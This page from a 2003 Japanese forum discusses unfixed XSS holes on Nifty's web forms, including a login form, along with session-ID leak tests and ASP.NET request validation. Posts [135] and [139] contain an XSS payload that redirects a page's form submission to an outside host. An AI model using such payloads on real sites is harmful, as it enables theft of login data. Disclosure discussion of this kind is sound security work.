投稿順表示 (275/282)
前のページ 1...270/271/272/273/274/275/276/277/278/279/280...282 次のページ
[146] Re: えび日記 : 「XSS大王Q&A」
yuu (2003年6月25日 15時55分)
>>セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。
> うおっと。
> とりあえずログは公開していないし、誰が見られるのかはまあ分かっていると思いますが、念のため変更しておいた方が良いかもですね。
パスワードってどうやって変更するのだっけ。
[145] Re: 話題「**」を含むえび日記
ばけら (2003年6月25日 15時53分)
>話題「**」を含むえび日記(に限らず、過去ログというもの全般にいえることですが)は、記事の順番が逆(古いものから新しいものへ)の方が読みやすいと思うのですが、いかがでしょうか。
あー、そうかも知れません。
ということで逆にしてみました。
[144] 話題「**」を含むえび日記
義珍 (2003年6月25日 15時7分)
話題「**」を含むえび日記(に限らず、過去ログというもの全般にいえることですが)は、記事の順番が逆(古いものから新しいものへ)の方が読みやすいと思うのですが、いかがでしょうか。
[143] Re: えび日記 : 「XSS大王Q&A」
ばけら (2003年6月25日 14時47分)
>セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。
うおっと。
とりあえずログは公開していないし、誰が見られるのかはまあ分かっていると思いますが、念のため変更しておいた方が良いかもですね。
[142] Re: えび日記 : 「XSS大王Q&A」
yuu (2003年6月25日 14時41分)
私のじゃないやつって、僕のかも。
セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。
念のためパスワード変更しておこっと。
[141] Re: えび日記 : 「XSS大王Q&A」
ばけら (2003年6月25日 14時12分)
>で、結局まだ沢山残ってるんですね?
実は私はあんまり調べてないのですが、office さんがそれなりに精力的に調査してくださったようで、3ヶ所ほど発見されています。いずれも未修整で、うち一つは SSL 保護つきのログインフォームです。先日の DOM 使用例はそこできっちり動作しました。
これについてニフティが把握しているかどうかは分かりません。全フォームについて調査していると思うので、気づくだろうとは思うのですが……。
[140] Re: えび日記 : 「XSS大王Q&A」
賄い (2003年6月25日 13時43分)
いやいや、明快、明快、実に解りやすい。
で、結局まだ沢山残ってるんですね?
といっても28日までにまだ2.5日ありますが。う~ん、おまけして7月までにと延ばしてあげましょう。NIFTYさん。
[139] ちょっとテスト
ばけら (2003年6月25日 11時59分)
"><script>document.forms[0].action="http://altba.com";document.forms[0].method="get"</script><span
[138] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
ばけら (2003年6月25日 11時56分)
>>なぜかここに投稿しようとするとエラーになるので
調査しましたが、やはり ASP.NET 自身がこういうエラーを出してますね。
================
危険な可能性のある Request.Form 値がクライアントから検出されました。
説明 : 要求の検証により、危険性のあるクライアント入力値が検出されました。要求の処理は中止されました。この値は、クロス サイト スクリプト攻撃などのアプリケーションのセキュリティ問題を引き起こす可能性があります。ページ ディレクティブか、 構成セクションの validateRequest=false を設定することによって要求の検証を無効にできます。しかしこの場合、アプリケーションですべての入力を明示的に確認することをお勧めします。
例外の詳細: System.Web.HttpRequestValidationException: 危険な可能性のある Request.Form 値がクライアントから検出されました。
================
この機能はオフにできるはずなので、ちょっと調べてみます。
[137] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
ばけら (2003年6月25日 11時52分)
>なぜかここに投稿しようとするとエラーになるので
どんなエラーが出ていましたか?
実は ASP.NET 自体にヤバ目な POST を弾く機能があったりするので、そのせいかもしれません。
[136] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
えむけい (2003年6月24日 23時15分)
なぜかここに投稿しようとするとエラーになるのでよりaccesibleな【謎】exploitはとりあえずポータル墓場に投稿しておきます。
http://white.sakura.ne.jp/~rryu/hakaba/bbs.cgi?mode=mes&id=1351
[135] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
えむけい (2003年6月24日 23時12分)
なんかタグを含む投稿で? エラーになります。再挑戦
"><script>document.forms[0].action="http://altba.com";document.forms[0].method="get"</script><span
[133] Re: えび日記 : 「とりまとめてください」
えむけい (2003年6月24日 22時50分)
> 取りに来るのは良いのですが、同じリソースを何度もゼロ間隔でというのはちょっと。たぶんアンテナに登録しているユーザの数だけリクエストしているのだろうと思いますが、一回にまとまらないのかしら。
特許対策かもしれません【謎】。
http://slashdot.jp/articles/03/06/23/2021235.shtml?topic=54
ていうかこの特許のせいで今後20年全世界のサーバに迷惑がかかりっぱなしとかなったらイヤすぎなんですが実施例はないんでしょうか。wgetとか。
とりあえず巡回ツール自身は更新日時を調べずIMSでサーバ任せにする分には問題なさげですが【調べずにカキコ】。
[131] Re: さすがクレーマーのツートップ
ばけら (2003年6月24日 21時7分)
お褒めにあずかり光栄ですが、実は私はこの件ではニフティにクレームなど入れていないのです。それどころか、この件についてはニフティからのコンタクトもなくて、やりとり皆無です。
#まあニフティとしても、フォーラム部ウザイからコンタクトするの嫌だ、なんて断言している人間とコンタクト取りたくないでしょうけれど……。
そんなわけで、全ては「善意ある方」とそのお仲間(?)の働きによるものです。もうちょっと具体的に言うと、例の記事が言う「一部のフォーラムマネジャー」の方々の功績です。
ところで sagamiさんのって、紙袋をノブにという話ですか?
[130] Re: えび日記 : 「XSS大王」
y-Aki (2003年6月24日 20時36分)
>御意【謎】。
>ハイパーさ【謎】に欠けたのだと思われます【謎】。
記録を掘り返してみたら、URLじゃなかった。
正直、スマンカッタ
[129] さすがクレーマーのツートップ
くろはた (2003年6月24日 20時20分)
なにはともあれ、私に現実的な影響を与えるクレーマーとしては
sagami さんとツートップを構成しているということの、証左と
いえましょう。素晴らしい :-)
[128] Re: 用語「GIF」
ばけら (2003年6月24日 20時8分)
>ソース公開希望。
公開してみました。
>C#はよくわからないという罠がありますがきっと別途定める親切な方【誰】がツッコミを入れてくれるでしょう【謎】。
これがまたかなりダサいソースなので C# が分かる人でも辛いかも知れません。各クラスの説明とかも無いので、本気で理解不可能かも。
実は自分でも辛かったりします。何しろ正真正銘の初心者な上、ちゃんと勉強したわけでもないので書き方の流儀とかさっぱり分からずテキトーに進めてきた結果がこれです。
というわけで、ソースを見て卒倒しないでください。
ってどこかで聞いたフレーズですが。
[127] Re: 用語「りゅうさん」
ばけら (2003年6月24日 18時16分)
>ところで【謎】用語にはコメントを付けられないのでしょうか。ていうか付けたい【謎】。
つけられるようになりました……したつもりです。
バグっていたらごめんなさい。
前のページ 1...270/271/272/273/274/275/276/277/278/279/280...282 次のページ